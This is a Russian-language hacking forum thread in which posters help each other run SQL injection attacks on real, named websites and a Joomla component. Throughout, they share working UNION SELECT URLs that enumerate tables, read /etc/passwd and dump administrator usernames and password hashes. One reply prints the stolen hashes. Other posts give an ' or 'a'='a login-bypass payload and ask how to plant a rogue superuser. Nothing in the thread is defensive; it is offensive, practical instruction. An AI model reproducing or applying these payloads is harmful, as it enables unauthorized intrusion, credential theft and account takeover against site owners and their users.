Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю

03.07.2009, 16:55
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
С нами:
8872766
Репутация:
0
|
|
Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--
А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--
Где грабли?
|
|
|

03.07.2009, 17:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от f1re
Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--
А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--
Где грабли?
Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(TABLE_NAME),1,1,1,1,1,2,2,2,2,2,2,2,2+FROM+INFORMATION_SCHEMA.TABLES--
CTRL+A
а вообще сдался тебе этот лимит:
Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,load_file('/etc/passwd'),1,1,1,1,1,2,2,2,2,2,2,2,2--
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Последний раз редактировалось Pashkela; 03.07.2009 в 17:53..
|
|
|

03.07.2009, 18:26
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
С нами:
8872766
Репутация:
0
|
|
Сообщение от Pashkela
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?
|
|
|

03.07.2009, 18:56
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
Сообщение от f1re
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?
Сипт может спокойно выводить структуру базы и данные из неё.
Fields user_id:user_pwd
[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4
Вот что выводит.
|
|
|

21.08.2007, 13:32
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Почитай статью КЕША.
http://forum.antichat.ru/showthread.php?t=30501
Там без юнион. Мне очень помогла статья, многие скули удалось провести.
|
|
|

21.08.2007, 13:40
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
Извените за оффтоп, но не удержался!
|
|
|

23.08.2007, 13:02
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами:
9982591
Репутация:
29
|
|
Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
на нем есть mssql injection:
http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHE MA.tables)--
провожу я - узнал все таблы:
'aSellers','aResponsiblePersons',
'eAuth_Groups',%20'eAuth_Groups_Members',
%20'eNotify_Log','ePage_Trans','eRoles',%20
'eRoles_Functions','syssegments','eRoles_Objects
','sysconstraints','aBlanks','aTariffs_Ethernet','
aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk ',
%20'aSharpdesignPortfolio','aTariffs_IPtel_World',
'xSearch_Pages','xSearch_Triads','xSearch_Words',
%20'eAuth','ePage','aTariffs_Dialup','vmNews','
dtproperties',%20'aHotLinks','zForms_Fields','
aSellers_Groups',%20'zForms_Forms','MainMenu','
votes','votes_answers','aHotImgs','mNews',%20
'Results','vAuth','vAuth_Active_NT','
vAuth_Active_Post','mWishBook_Groups',
'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
'aConnectZones','aSellers_Districts','mNews_Mailli st'
то что я нашел...(колумны я не стал писать) - но вот есть трабл:
Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
Вот проблема: колумн name я вывожу - се окей а вот
дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
Там еще много таблиц с колумноми pwd и все они выбрасыват....Help
Последний раз редактировалось x.Elf; 23.08.2007 в 13:05..
|
|
|

23.08.2007, 21:45
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
С нами:
10409701
Репутация:
18
|
|
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
|
|
|

24.08.2007, 20:54
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от cheb
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
Хех... попробуй
Код:
' or 'a'='a' LIMIT 0,1 /*
затем
Код:
' or 'a'='a' LIMIT 1,1 /*
пока не найдещь того юзера который тебе нужен...
__________________
Кто я?..
|
|
|

24.08.2007, 19:22
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами:
9851426
Репутация:
1676
|
|
На сайте под управлением joomla есть уязвимость
http://site.com/index.php?option=com_rwcards&task=listCards&catego ry_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*
Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?
Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|